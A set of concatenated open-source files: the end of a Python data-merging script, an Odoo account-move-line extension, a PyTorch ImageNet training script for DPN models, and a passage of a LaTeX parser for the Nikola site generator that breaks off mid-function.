arr_file = np.delete(arr_file, dele, 0)
dele = []
for r in range(arr_file.shape[0]):
for c in range(arr_file.shape[1]):
if arr_file[r][c] == '-':
dele.append(r)
break
# print arr_file.shape, dele
for r_dele in range(len(dele) - 2):
if dele[r_dele] + 1 >= dele[r_dele + 1]:
last_r_dele = r_dele + 1
continue
else:
flag += 1
tmp = arr_file[dele[r_dele] + 1 : dele[r_dele + 1]]
tmp_flag = np.ones((tmp.shape[0], 1)) * flag
tmp = np.hstack((tmp, tmp_flag))
print 'tmp.shape: ', tmp.shape
if tmp.shape[0] >= 31:
arr_file_ = np.vstack((arr_file_, tmp))
print '[AT MIDDLE] arr_file_.shape: ', arr_file_.shape, ' new_file.shape: ', new_file.shape
flag += 1
tmp = arr_file[dele[len(dele) - 1]:]
tmp_flag = np.ones((tmp.shape[0], 1)) * flag
tmp = np.hstack((tmp, tmp_flag))
if tmp.shape[0] >= 31:
arr_file_ = np.vstack((arr_file_, tmp))
print '[AT END] arr_file_.shape: ', arr_file_.shape, ' new_file.shape: ', new_file.shape
for r in range(arr_file_.shape[0]):
for c in range(arr_file_.shape[1]):
try:
arr_file_[r][c] = float(arr_file_[r][c])
except ValueError:
continue
# print arr_file
new_file = np.vstack((new_file, arr_file_))
print '[FINAL FOR ONE FILE] arr_file_.shape: ', arr_file_.shape, ' new_file.shape: ', new_file.shape
# print headers.shape
# hwr.close()
# wr.close()
new_file = np.vstack((headers[0], new_file))
np.savetxt(write_path, new_file, fmt='%s', delimiter=',')
np.savetxt(check_path, headers, fmt='%s', delimiter=',')
print headers[0]
print headers.shape
print new_file.shape, '\n'
| CullenGao/LSTM_PittsRoutine | script/cat_participants.py | Python | mit | 5,085 |
# -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of account_move_reconcile_helper,
# an Odoo module.
#
# Copyright (c) 2015 ACSONE SA/NV (<http://acsone.eu>)
#
# account_move_reconcile_helper is free software:
# you can redistribute it and/or modify it under the terms of the GNU
# Affero General Public License as published by the Free Software
# Foundation,either version 3 of the License, or (at your option) any
# later version.
#
# account_move_reconcile_helper is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with account_move_reconcile_helper.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, api, fields
from openerp.osv import fields as old_fields
class AccountMoveLine(models.Model):
_inherit = 'account.move.line'
# Currenly, isn't possible to use new api to override reconcile_ref because
# addons/account/wizard/account_fiscalyear_close.py uses _store_set_values on
# reconcile_ref
# @api.one
# @api.depends('reconcile_id', 'reconcile_partial_id')
# def _get_reconcile_ref(self):
# if self.reconcile_id.id:
# self.reconcile_ref = str(self.reconcile_id.name)
# elif self.reconcile_partial_id.id:
# self.reconcile_ref = "P/" + str(self.reconcile_partial_id.name)
def _get_reconcile(self, cr, uid, ids, name, unknow_none, context=None):
res = dict.fromkeys(ids, False)
for line in self.browse(cr, uid, ids, context=context):
if line.reconcile_id:
res[line.id] = str(line.reconcile_id.name)
elif line.reconcile_partial_id:
res[line.id] = "P/" + str(line.reconcile_partial_id.name)
return res
def _get_move_from_reconcile(self, cr, uid, ids, context=None):
move = {}
for r in self.pool.get('account.move.reconcile')\
.browse(cr, uid, ids, context=context):
for line in r.line_partial_ids:
move[line.move_id.id] = True
for line in r.line_id:
move[line.move_id.id] = True
move_line_ids = []
if move:
move_line_ids = self.pool.get('account.move.line')\
.search(cr, uid, [('move_id', 'in', move.keys())],
context=context)
return move_line_ids
_columns = {
'reconcile_ref': old_fields.function(
_get_reconcile, type='char', string='Reconcile Ref',
oldname='reconcile',
store={'account.move.line': (lambda self, cr, uid, ids, c={}: ids,
['reconcile_id',
'reconcile_partial_id'], 50),
'account.move.reconcile': (_get_move_from_reconcile, None,
50)}),
}
credit_debit_balance = fields.Float(compute='compute_debit_credit_balance',
string='Balance')
# reconcile_ref = fields.Char(compute='_get_reconcile_ref', store=True)
@api.one
def compute_debit_credit_balance(self):
self.credit_debit_balance = self.debit - self.credit
| Vauxoo/account-financial-tools | account_move_reconcile_helper/models/account_move_line.py | Python | agpl-3.0 | 3,617 |
import argparse
import os
import shutil
import time
import math
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
from dpn import dpns
model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
model_names += dpns.keys()
parser = argparse.ArgumentParser(description='PyTorch ImageNet Training')
parser.add_argument('data', metavar='DIR',
help='path to dataset')
parser.add_argument('--arch', '-a', metavar='ARCH', default='dpn92',
choices=model_names,
help='model architecture: ' +
' | '.join(model_names) +
' (default: dpn92)')
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--epochs', default=90, type=int, metavar='N',
help='number of total epochs to run')
parser.add_argument('--start-epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('-b', '--batch-size', default=32, type=int,
metavar='N', help='mini-batch size (default: 256)')
parser.add_argument('--lr', '--learning-rate', default=math.sqrt(0.1), type=float,
metavar='LR', help='initial learning rate')
parser.add_argument('--momentum', default=0.9, type=float, metavar='M',
help='momentum')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('--print-freq', '-p', default=10, type=int,
metavar='N', help='print frequency (default: 10)')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true',
help='evaluate model on validation set')
parser.add_argument('--pretrained', dest='pretrained', action='store_true',
help='use pre-trained model')
best_prec1 = 0
def main():
global args, best_prec1
args = parser.parse_args()
# create model
if args.pretrained:
print("=> using pre-trained model '{}'".format(args.arch))
model = models.__dict__[args.arch](pretrained=True)
else:
print("=> creating model '{}'".format(args.arch))
if args.arch.startswith('dpn'):
model = dpns[args.arch]()
else:
model = models.__dict__[args.arch]()
if args.arch.startswith('alexnet') or args.arch.startswith('vgg'):
model.features = torch.nn.DataParallel(model.features)
model.cuda()
else:
model = torch.nn.DataParallel(model).cuda()
# define loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss().cuda()
optimizer = torch.optim.SGD(model.parameters(), args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
args.start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
cudnn.benchmark = True
# Data loading code
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'val')
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
train_loader = torch.utils.data.DataLoader(
datasets.ImageFolder(traindir, transforms.Compose([
transforms.RandomSizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
])),
batch_size=args.batch_size, shuffle=True,
num_workers=args.workers, pin_memory=True)
val_loader = torch.utils.data.DataLoader(
datasets.ImageFolder(valdir, transforms.Compose([
transforms.Scale(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize,
])),
batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
if args.evaluate:
validate(val_loader, model, criterion)
return
for epoch in range(args.start_epoch, args.epochs):
adjust_learning_rate(optimizer, epoch)
# train for one epoch
train(train_loader, model, criterion, optimizer, epoch)
# evaluate on validation set
prec1 = validate(val_loader, model, criterion)
# remember best prec@1 and save checkpoint
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
'optimizer' : optimizer.state_dict(),
}, is_best)
def train(train_loader, model, criterion, optimizer, epoch):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to train mode
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
target = target.cuda(async=True)
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
# measure accuracy and record loss
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data[0], input.size(0))
top1.update(prec1[0], input.size(0))
top5.update(prec5[0], input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, top1=top1, top5=top5))
def validate(val_loader, model, criterion):
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
target = target.cuda(async=True)
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
# measure accuracy and record loss
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data[0], input.size(0))
top1.update(prec1[0], input.size(0))
top5.update(prec5[0], input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1, top5=top5))
print(' * Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
return top1.avg
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, 'model_best.pth.tar')
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def adjust_learning_rate(optimizer, epoch):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = args.lr * (0.1 ** (epoch // 30))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0)
res.append(correct_k.mul_(100.0 / batch_size))
return res
if __name__ == '__main__':
main()
| oyam/pytorch-DPNs | main.py | Python | mit | 10,273 |
# -*- coding: utf-8 -*-
# Copyright © 2014-2017 Felix Fontein
#
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Parser for LaTeX inputs."""
from __future__ import unicode_literals
from . import tree, tokenizer
import nikola.utils
import re
LOGGER = nikola.utils.get_logger('compile_latex.parser', nikola.utils.STDERR_HANDLER)
# Some constants and helper functions
class _Level(object):
Text = 10
SubSubSection = 5
SubSection = 4
Section = 3
Chapter = 2
Everything = -1
NO_LEVEL = -2
@staticmethod
def get_level(command):
if command == "chapter":
return _Level.Chapter
elif command == "section":
return _Level.Section
elif command == "subsection":
return _Level.SubSection
elif command == "subsubsection":
return _Level.SubSubSection
else:
return _Level.NO_LEVEL
@staticmethod
def create_object(level, title):
if level == _Level.SubSubSection:
return tree.SubSubSection(title)
elif level == _Level.SubSection:
return tree.SubSection(title)
elif level == _Level.Section:
return tree.Section(title)
elif level == _Level.Chapter:
return tree.Chapter(title)
raise Exception("Unknown level '{}'!".format(level))
class ParseError(Exception):
"""Represent error while parsing."""
def __init__(self, tokenstream, message, filename=None):
"""Create error in given token stream with message and optional filename."""
template = ("{2}@{0}: {1}" if filename is not None else "{0}: {1}")
super(ParseError, self).__init__(template.format(tokenstream.get_position(tokenstream.current_indices()[0]), message, filename))
class CommandInfo:
"""Represents information of a command."""
def __init__(self, command_name, argument_count, eat_trailing_whitespace, default_arguments, accept_unknown_commands=False, url_mode=set()):
"""Create command information.
command_name: name of command;
argument_count: number of arguments;
eat_trailing_whitespace: whether to eat trailing whitespace or not;
default_arguments: list of default arguments;
accept_unknown_commands: whether to accept unknown commands in arguments;
url_mode: set of which arguments to process in URL mode.
"""
self.command_name = command_name
self.argument_count = argument_count
self.eat_trailing_whitespace = eat_trailing_whitespace
self.default_arguments = default_arguments
self.accept_unknown_commands = accept_unknown_commands
self.url_mode = url_mode
class EnvironmentInfo:
"""Represents information of an environment."""
def __init__(self, environment_name, argument_count, eat_trailing_whitespace, default_arguments, accept_unknown_commands=False, url_mode=set()):
"""Create environment information.
environment_name: name of environment;
argument_count: number of arguments;
eat_trailing_whitespace: whether to eat trailing whitespace or not;
default_arguments: list of default arguments;
accept_unknown_commands: whether to accept unknown commands in arguments;
url_mode: set of which arguments to process in URL mode.
"""
self.environment_name = environment_name
self.argument_count = argument_count
self.eat_trailing_whitespace = eat_trailing_whitespace
self.default_arguments = default_arguments
self.accept_unknown_commands = accept_unknown_commands
self.url_mode = url_mode
# Simple string replacement commands.
_replacement_commands = {
'ldots': '\u2026',
'vdots': '\u22EE',
'cdots': '\u22EF',
}
class ParsingEnvironment(object):
"""Environmental data for parsing, like registered commands and environments."""
languages = {
'albanian': {'locale': 'sq'},
# 'amharic': {'locale': 'am'},
'arabic': {'locale': 'ar', 'right_to_left': True},
'armenian': {'locale': 'hy'},
# 'asturian': {'locale': 'ast'},
# 'bahasai': {'locale': ''},
# 'bahasam': {'locale': ''},
'basque': {'locale': 'eu'},
# 'bengali': {'locale': 'bn'},
'brazil': {'locale': 'pt-br'},
'brazilian': {'locale': 'pt-br'},
'breton': {'locale': 'br'},
'bulgarian': {'locale': 'bg'},
'catalan': {'locale': 'ca'},
# 'coptic': {'locale': 'cop'},
'croatian': {'locale': 'hr'},
'czech': {'locale': 'cs'},
'danish': {'locale': 'da'},
# 'divehi': {'locale': ''},
'dutch': {'locale': 'nl'},
'english': {'locale': 'en'},
'esperanto': {'locale': 'eo'},
'estonian': {'locale': 'et'},
'farsi': {'locale': 'fa', 'right_to_left': True},
'finnish': {'locale': 'fr'},
'french': {'locale': 'fr'},
'friulan': {'locale': 'fur'},
'galician': {'locale': 'gl'},
'german': {'locale': 'de'},
'greek': {'locale': 'el'},
'hebrew': {'locale': 'he', 'right_to_left': True},
# 'hindi': {'locale': 'hi'},
'icelandic': {'locale': 'is'},
# 'interlingua': {'locale': ''},
'irish': {'locale': 'ga'},
'italian': {'locale': 'it'},
# 'kannada': {'locale': 'kn'},
# 'khmer': {'locale': 'km'},
# 'korean': {'locale': 'ko'},
# 'lao': {'locale': 'lo'},
'latin': {'locale': 'la'},
'latvian': {'locale': 'lv'},
'lithuanian': {'locale': 'lt'},
# 'lsorbian': {'locale': ''},
'magyar': {'locale': 'hu'},
# 'malayalam': {'locale': 'ml'},
# 'marathi': {'locale': 'mr'},
# 'nko': {'locale': ''},
'norsk': {'locale': 'nb'},
'nynorsk': {'locale': 'nn'},
'occitan': {'locale': 'oc'},
'piedmontese': {'locale': 'pms'},
'polish': {'locale': 'pl'},
'portuges': {'locale': 'pt'},
'romanian': {'locale': 'ro'},
'romansh': {'locale': 'rm'},
'russian': {'locale': 'ru'},
# 'samin': {'locale': ''},
# 'sanskrit': {'locale': 'sa'},
'scottish': {'locale': 'sco'},
'serbian': {'locale': 'sr'},
'slovak': {'locale': 'sk'},
'slovenian': {'locale': 'sl'},
'spanish': {'locale': 'es'},
'swedish': {'locale': 'sv'},
# 'syriac': {'locale': 'syc'},
# 'tamil': {'locale': 'ta'},
# 'telugu': {'locale': 'te'},
# 'thai': {'locale': 'th'},
# 'tibetan': {'locale': ''},
'turkish': {'locale': 'tr'},
'turkmen': {'locale': 'tk'},
'ukrainian': {'locale': 'uk'},
'urdu': {'locale': 'ur', 'right_to_left': True},
# 'usorbian': {'locale': ''},
# 'vietnamese': {'locale': 'vi'},
'welsh': {'locale': 'cy'},
}
def __init__(self):
"""Initialize default environment."""
self.commands = {}
self.environments = {}
self.register_command("item", 0)
self.register_command_WS("code", 1)
self.register_command_WS("textbf", 1)
self.register_command_WS("textit", 1)
self.register_command_WS("texttt", 1)
self.register_command_WS("emph", 1)
self.register_command("newpar", 0)
self.register_command("chapter", 1)
self.register_command("section", 1)
self.register_command("subsection", 1)
self.register_command("subsubsection", 1)
self.register_command_WS("href", 2, url_mode={0})
self.register_command_WS("url", 1, url_mode={0})
self.register_command_WS("label", 1)
self.register_command_WS("ref", 2, None)
self.register_command_WS("symbol", 1)
self.register_command_WS("foreignlanguage", 2)
self.register_command("qed", 0)
self.register_command("includegraphics", 2, None, accept_unknown_commands=True)
self.register_command("setlength", 2, accept_unknown_commands=True)
self.register_command("noindent", 0)
self.register_command("hline", 0)
self.register_command("cline", 1)
self.register_environment_WS("codelisting", 1)
self.register_environment("definition", 1, None)
self.register_environment("definitions", 1, None)
self.register_environment("lemma", 1, None)
self.register_environment("proposition", 1, None)
self.register_environment("theorem", 1, None)
self.register_environment("corollary", 1, None)
self.register_environment("example", 1, None)
self.register_environment("examples", 1, None)
self.register_environment("remark", 1, None)
self.register_environment("remarks", 1, None)
self.register_environment("proof", 1, None)
self.register_environment("align*", 0)
self.register_environment("align", 0)
self.register_environment("itemize", 0)
self.register_environment("enumerate", 0)
self.register_environment("tikzpicture", 1, None, accept_unknown_commands=True)
self.register_environment("pstricks", 1, accept_unknown_commands=True)
self.register_environment("blockquote", 0)
self.register_environment("center", 0)
self.register_environment("picturegroup", 0)
self.register_environment("formulalist", 1, 1)
self.register_environment("tabular", 1)
for replacement in _replacement_commands.keys():
self.register_command_WS(replacement, 0)
def register_command(self, command_name, argument_count, *default_arguments, accept_unknown_commands=False, url_mode=set()):
"""Register a new command.
command_name: name of command;
argument_count: number of arguments;
default_arguments: list of default arguments;
accept_unknown_commands: whether to accept unknown commands in arguments;
url_mode: set of which arguments to process in URL mode.
"""
self.commands[command_name] = CommandInfo(command_name, argument_count, True, default_arguments, accept_unknown_commands=accept_unknown_commands, url_mode=url_mode)
def register_command_WS(self, command_name, argument_count, *default_arguments, accept_unknown_commands=False, url_mode=set()):
"""Register a new command which does not eat trailing whitespace.
command_name: name of command;
argument_count: number of arguments;
default_arguments: list of default arguments;
accept_unknown_commands: whether to accept unknown commands in arguments;
url_mode: set of which arguments to process in URL mode.
"""
self.commands[command_name] = CommandInfo(command_name, argument_count, False, default_arguments, accept_unknown_commands=accept_unknown_commands, url_mode=url_mode)
def register_environment(self, environment_name, argument_count, *default_arguments, accept_unknown_commands=False, url_mode=set()):
"""Register a new environment.
environment_name: name of environment;
argument_count: number of arguments;
default_arguments: list of default arguments;
accept_unknown_commands: whether to accept unknown commands in arguments;
url_mode: set of which arguments to process in URL mode.
"""
self.environments[environment_name] = EnvironmentInfo(environment_name, argument_count, True, default_arguments, accept_unknown_commands=accept_unknown_commands, url_mode=url_mode)
def register_environment_WS(self, environment_name, argument_count, *default_arguments, accept_unknown_commands=False, url_mode=set()):
"""Register a new environment which does not eat trailing whitespace.
environment_name: name of environment;
argument_count: number of arguments;
default_arguments: list of default arguments;
accept_unknown_commands: whether to accept unknown commands in arguments;
url_mode: set of which arguments to process in URL mode.
"""
self.environments[environment_name] = EnvironmentInfo(environment_name, argument_count, False, default_arguments, accept_unknown_commands=accept_unknown_commands, url_mode=url_mode)
class Parser:
"""The LaTeX parser."""
def __init__(self, input, parsing_environment, filename=None):
"""Create parser from input string and parsing environment."""
self.tokens = tokenizer.TokenStream(input)
self.parsing_environment = parsing_environment
self.filename = filename
def __expect(self, token, skip=True):
if self.tokens.current_type() == token:
if skip:
self.tokens.skip_current()
else:
raise ParseError(self.tokens, "Expected {0}, but found {1}!".format(token, self.tokens.current()), filename=self.filename)
def __command_name(self, command):
if len(command) == 2:
return "\\{0}".format(command[0])
else:
return "\\{0}{{{1}}}".format(command[0], command[1])
def __flatten(self, block):
if isinstance(block, tree.Block):
while True:
if len(block.elements) == 1 and isinstance(block.elements[0], tree.Block):
if type(block) == tree.Block:
block.elements[0].labels.extend(block.labels)
block = block.elements[0]
elif type(block.elements[0]) == tree.Block:
block.labels.extend(block.elements[0].labels)
block.elements = block.elements[0].elements
else:
block.elements[0] = self.__flatten(block.elements[0])
break
else:
for i in range(len(block.elements)):
block.elements[i] = self.__flatten(block.elements[i])
break
return block
def __get_inline_code(self, code_type):
code_type = code_type.recombine_as_text()
end_token = None
end_char = None
skip_first_char = False
if self.tokens.current_type() == tokenizer.Token.CurlyBraketOpen:
end_token = tokenizer.Token.CurlyBraketClose
start = self.tokens.current_indices()[1]
elif self.tokens.current_type() == tokenizer.Token.Text:
end_char = self.tokens.current_value()[0]
skip_first_char = True
start = self.tokens.current_indices()[0] + 1
else:
raise ParseError(self.tokens, "Invalid delimiter {} for inline code!".format(self.tokens.current()), filename=self.filename)
while self.tokens.has_current():
if self.tokens.current_type() == end_token:
end = self.tokens.current_indices()[0]
self.tokens.skip_current()
break
elif (self.tokens.current_type() == tokenizer.Token.Text or self.tokens.current_type() == tokenizer.Token.EscapedText) and end_char is not None:
si = 0
if skip_first_char:
si = 1
skip_first_char = False
index = self.tokens.current_value().find(end_char, si)
if index >= si:
end = self.tokens.current_indices()[0] + index
if self.tokens.current_type() == tokenizer.Token.EscapedText:
end += 1
if index == len(self.tokens.current_value()) - 1:
self.tokens.skip_current()
else:
self.tokens.set_value(0, self.tokens.current_value()[index + 1:])
break
self.tokens.skip_current()
return tree.Code(code_type, self.tokens.get_substring(start, end))
def __get_formatting(self, command):
if len(command) == 2 and command[0] in ["emph", "textbf", "textit", "texttt"]:
if isinstance(command[1][0], tree.Words):
result = command[1][0]
else:
result = tree.Words()
if command[1][0] is not None:
result.words.append(command[1][0])
if command[0] == "emph":
result.formatting = "emphasize"
elif command[0] == "textbf":
result.formatting = "strong"
elif command[0] == "textit":
result.formatting = "strong"
elif command[0] == "texttt":
result.formatting = "teletype"
return result
else:
return None
def __get_includegraphics(self, command):
url = command[1][0].recombine_as_text()
args = dict()
if command[1][1] is not None:
for argPair in re.split("\s*,\s*", command[1][1].recombine_as_text().strip()):
arg = argPair.split("=")
assert len(arg) == 2
args[arg[0].strip()] = arg[1].strip()
return tree.IncludeGraphics(url, args)
def __get_tikz_picture(self, command):
start = self.tokens.current_indices()[0]
while self.tokens.has_current():
if self.tokens.current() == (tokenizer.Token.Command, "end") and self.tokens.peek_type(1) == tokenizer.Token.CurlyBraketOpen and self.tokens.peek(2) == (tokenizer.Token.Text, command[1]) and self.tokens.peek_type(3) == tokenizer.Token.CurlyBraketClose:
stop = self.tokens.current_indices()[0]
self.tokens.skip_current(4)
break
self.tokens.skip_current()
content = self.tokens.get_substring(start, stop).strip()
args = None
if command[2][0] is not None:
args = command[2][0].recombine_as_text().strip()
return tree.TikzPicture(content, args)
def __get_PSTricks_picture(self, command):
start = self.tokens.current_indices()[0]
while self.tokens.has_current():
if self.tokens.current() == (tokenizer.Token.Command, "end") and self.tokens.peek_type(1) == tokenizer.Token.CurlyBraketOpen and self.tokens.peek(2) == (tokenizer.Token.Text, command[1]) and self.tokens.peek_type(3) == tokenizer.Token.CurlyBraketClose:
stop = self.tokens.current_indices()[0]
self.tokens.skip_current(4)
break
self.tokens.skip_current()
content = self.tokens.get_substring(start, stop).strip()
argsList = re.split("\s*,\s*", command[2][0].recombine_as_text().strip())
args = dict()
for entry in argsList:
entry = entry.split("=")
assert len(entry) == 2
args[entry[0].strip()] = entry[1].strip()
return tree.PSTricksPicture(content, args)
def __parse_command_impl(self, cmd, env, is_environment, eat_trailing_whitespace, argument_count, default_arguments, accept_unknown_commands=False, math_mode=False, url_mode=set()):
args = []
# Adjust argument count
argument_count -= len(default_arguments)
# Scan default arguments
found_default_arguments = []
while len(found_default_arguments) < len(default_arguments):
idx = 0
while self.tokens.peek_type(idx) == tokenizer.Token.Whitespace:
idx += 1
if self.tokens.peek_type(idx) == tokenizer.Token.SquareBraketOpen:
while idx > 0:
self.tokens.skip_current()
idx -= 1
while self.tokens.current_type() in {tokenizer.Token.Whitespace, tokenizer.Token.Comment}:
self.tokens.skip_current()
self.__expect(tokenizer.Token.SquareBraketOpen)
found_default_arguments.append(self.__parse_words(math_mode=math_mode, delimiter=tokenizer.Token.SquareBraketClose, accept_unknown_commands=accept_unknown_commands, url_mode=idx in url_mode))
self.__expect(tokenizer.Token.SquareBraketClose)
else:
break
while len(found_default_arguments) < len(default_arguments):
found_default_arguments.append(default_arguments[len(found_default_arguments)])
# Scan other arguments
while len(args) < argument_count:
while self.tokens.current_type() in {tokenizer.Token.Whitespace, tokenizer.Token.Comment}:
self.tokens.skip_current()
self.__expect(tokenizer.Token.CurlyBraketOpen)
args.append(self.__parse_words(math_mode=math_mode, delimiter=tokenizer.Token.CurlyBraketClose, accept_unknown_commands=accept_unknown_commands, url_mode=len(args) in url_mode))
self.__expect(tokenizer.Token.CurlyBraketClose)
if eat_trailing_whitespace:
while self.tokens.current_type() in {tokenizer.Token.Whitespace, tokenizer.Token.Comment}:
self.tokens.skip_current()
else:
while self.tokens.current_type() == tokenizer.Token.Comment:
self.tokens.skip_current()
# Add default arguments at end of usual arguments
args.extend(found_default_arguments)
if is_environment:
return cmd, env, args
else:
return cmd, args
def __parse_command(self, accept_unknown_commands, math_mode=False):
self.__expect(tokenizer.Token.Command, False)
cmd = self.tokens.current_value()
is_environment = False
if cmd == "begin" or cmd == "end":
is_environment = True
self.tokens.skip_current()
# Determine number of arguments
if is_environment:
while self.tokens.current_type() in {tokenizer.Token.Whitespace, tokenizer.Token.Comment}:
self.tokens.skip_current()
self.__expect(tokenizer.Token.CurlyBraketOpen)
env = self.tokens.current_value()
self.__expect(tokenizer.Token.Text)
self.__expect(tokenizer.Token.CurlyBraketClose)
if env not in self.parsing_environment.environments:
if accept_unknown_commands:
while self.tokens.current_type() in {tokenizer.Token.Whitespace, tokenizer.Token.Comment}:
self.tokens.skip_current()
return (cmd, env),
raise ParseError(self.tokens, "Unknown environment '{}'!".format(env), filename=self.filename)
envI = self.parsing_environment.environments[env]
eat_trailing_whitespace = envI.eat_trailing_whitespace
if cmd == "end":
argument_count = 0
default_arguments = []
accept_unknown_commands = False
url_mode = set()
else:
argument_count = envI.argument_count
default_arguments = envI.default_arguments
accept_unknown_commands = envI.accept_unknown_commands
url_mode = envI.url_mode
else:
if cmd not in self.parsing_environment.commands:
if accept_unknown_commands:
while self.tokens.current_type() in {tokenizer.Token.Whitespace, tokenizer.Token.Comment}:
self.tokens.skip_current()
return cmd,
raise ParseError(self.tokens, "Unknown command '{}'!".format(cmd), filename=self.filename)
cmdI = self.parsing_environment.commands[cmd]
eat_trailing_whitespace = cmdI.eat_trailing_whitespace
argument_count = cmdI.argument_count
default_arguments = cmdI.default_arguments
accept_unknown_commands = cmdI.accept_unknown_commands
url_mode = cmdI.url_mode
env = None
return self.__parse_command_impl(cmd, env, is_environment, eat_trailing_whitespace, argument_count, default_arguments, accept_unknown_commands=accept_unknown_commands, math_mode=math_mode, url_mode=url_mode)
def __postprocess_text(self, text):
for f, t in [
("<<", "\u00AB"),
(">>", "\u00BB"),
("---", "\u2014"),
("--", "\u2013"),
("``", "\u201C"),
("''", "\u201D"),
]:
text = text.replace(f, t)
return text
def __add_language(self, element, language, inline=True):
langdata = self.parsing_environment.languages.get(language)
if langdata is None:
raise Exception("Unknown language '{0}'!".format(language))
return tree.Language(element, langdata.get('right_to_left', False), langdata['locale'], inline=inline)
def __parse_symbol(self, code):
try:
code = int(code)
except Exception:
